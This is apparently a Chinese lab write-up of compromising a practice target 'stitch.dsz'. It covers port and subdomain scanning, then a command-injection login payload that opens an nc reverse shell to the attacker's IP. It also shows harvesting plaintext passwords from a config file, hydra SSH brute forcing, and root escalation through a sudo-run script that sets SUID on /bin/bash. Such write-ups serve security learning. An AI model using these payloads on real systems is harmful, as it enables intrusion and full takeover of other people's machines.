正文

kali攻击机地址:192.168.1.4
靶场地址:192.168.1.19

1、端口扫描

在kali里,使用nmap工具:

nmap -sV -v -T4 -A 192.168.1.19

在这里插入图片描述
22和80端口是开放的。进入网页,发现域名stitch.dsz

在这里插入图片描述

2、域名重定向

修改kali中hosts:

 vi /etc/hosts

进入hosts文件里,添加:

192.168.1.19 stitch.dsz

:wq!退出,重新访问http://stitch.dsz ,发现域名重定向了:
在这里插入图片描述
使用子域名扫描工具:

wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u stitch.dsz -H 'Host:FUZZ.stitch.dsz' --hw 1348

扫出来3个子域名,http://mail.stitch.dszhttp://dog.stitch.dszhttp://iot.stitch.dsz:
在这里插入图片描述
重新编辑kali里面的/etc/hosts文件:

192.168.1.19 stitch.dsz dog.stitch.dsz mail.stitch.dsz iot.Stitch.dsz

在这里插入图片描述

顺便修改windows下的Hosts文件:

C:\Windows\System32\drivers\etc\hosts

在这里插入图片描述

3、NC反弹

登录http://iot.stitch.dsz/,爆破用户名和密码的时候,可以对用户名构造nc连接语句:

;busybox nc 192.168.1.4 4444 -e /bin/bash;

在这里插入图片描述
调整格式:

/usr/bin/script -qc /bin/bash /dev/null
CTRL+Z
stty raw -echo;fg
reset
xterm
cd ..
find ./

4、文件查找

/www目录下有个./dog/config.php文件:
在这里插入图片描述
可以发现里面存了一堆密码:

3c4900896d92da
3c4900896d92da789abc
s3cur3P@ssw0rd

在这里插入图片描述

5、iiiii用户登录

先拿iiiii:3c4900896d92da对应的用户名、密码远程访问iiiii用户:

su - iiiii

在这里插入图片描述

6、/HOME下多用户筛选

筛选/home目录下的所有用户:

#写法1
ls -al | awk '{print $NF}'
#写法2,输出结果跳过前三行
ls -al | awk ' NR>3 {print $NF}'

在这里插入图片描述

7、多用户爆破

hydra -L usr.txt -P pass1.txt ssh://192.168.1.19 -I -e nrs

在这里插入图片描述
切换iotuser用户后,发现可以执行iot_runner的脚本:
在这里插入图片描述

8、iot_runner程序漏洞利用

iotuser用户下操作:

cd /tmp
vi a.sh
IOT#
chmod +s /bin/bash

chmod 600 /tmp/a.sh

在这里插入图片描述
iiiii用户下操作:

sudo /usr/bin/push_iot /tmp/a.sh

在这里插入图片描述
iotuser用户下操作:

sudo /usr/bin/iot_runner a.sh
bash -p

在这里插入图片描述

大致意思解释 :
(1)在 iotuser 下:创建恶意脚本

cd /tmp        # 进入临时目录(所有人可写)
vi a.sh        # 创建脚本 a.sh

脚本内容 最关键

chmod +s /bin/bash
  • chmod +s:给文件设置 SUID 权限
  • /bin/bash:系统的 bash 命令行工具
  • 效果:让 /bin/bash 变成 任何人运行都直接获得 root 权限

(2)设置脚本权限

chmod 600 /tmp/a.sh
  • 让脚本只能被 iotuser 读写
  • 避免被其他用户修改或删除

(3)在 iiiii 用户下:把脚本推给 iot_runner

sudo /usr/bin/push_iot /tmp/a.sh

作用:

  • /tmp/a.sh 放到 iot_runner 可以执行的位置
  • 让后面的 iot_runner 能找到并运行它

( 4)回到 iotuser以 root 权限执行恶意脚本

sudo /usr/bin/iot_runner a.sh

  1. iot_runnerroot 权限运行

  2. 它执行了你的 a.sh

  3. a.sh 执行:

    chmod +s /bin/bash

    结果:/bin/bash 获得了 SUID root 权限

(5)最终:拿到 root 权限

bash -p

-p 是什么?

  • 保留 SUID 权限
  • 不降级权限
  • 直接以 root 身份打开 shell

执行完这一句,你就已经 从普通用户 → 变成 root 了!

# 学习
Logo
AtomGit开源社区

AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。

更多推荐

硬核教程:用Gemini境像站对会议记录进行多维语义分析,自动生成决议追踪与待办分配看板(国内免费镜像实测)

将会议纪要的整理工作从“手工概括”升级为“多维语义抽取+结构化输出”,本质上是把不可计算的经验判断变成了可模板化调用的分析流程。Gemini在这条链路中扮演了信息挖掘引擎的角色,其抽取的决议、待办和分歧点,既能即时生成看板推动执行,也能沉淀为团队知识库的一部分。如果你想在自己的团队中落地这套会议分析方法,推荐使用RskAi它免去网络配置的麻烦,国内浏览器打开即可调用Gemini,目前提供的免费额度

avatar AtomGit开源社区
cover

catlass:昇腾算子开发者的“模板库“,和 NVIDIA 的 CUTLASS 是什么关系

avatar AtomGit开源社区

【顶级EI复现】考虑用户行为基于扩散模型的电动汽车充电场景生成( Python + PyTorch代码实现)

针对大规模电动汽车无序充电对配电网稳定运行带来的挑战,传统统计建模方法难以刻画用户行为驱动下充电负荷的强随机性、时序依赖性与多维耦合特征,难以生成贴合实际运行规律的充电场景。为此,本文提出一种基于条件去噪扩散概率模型的电动汽车充电场景生成方法。首先,基于充电起始时刻、充电时长、充电功率、用户出行习惯等多维信息,构建用户个体与场站集群两层级行为特征矩阵,搭建多层级充电场景生成框架;

avatar AtomGit开源社区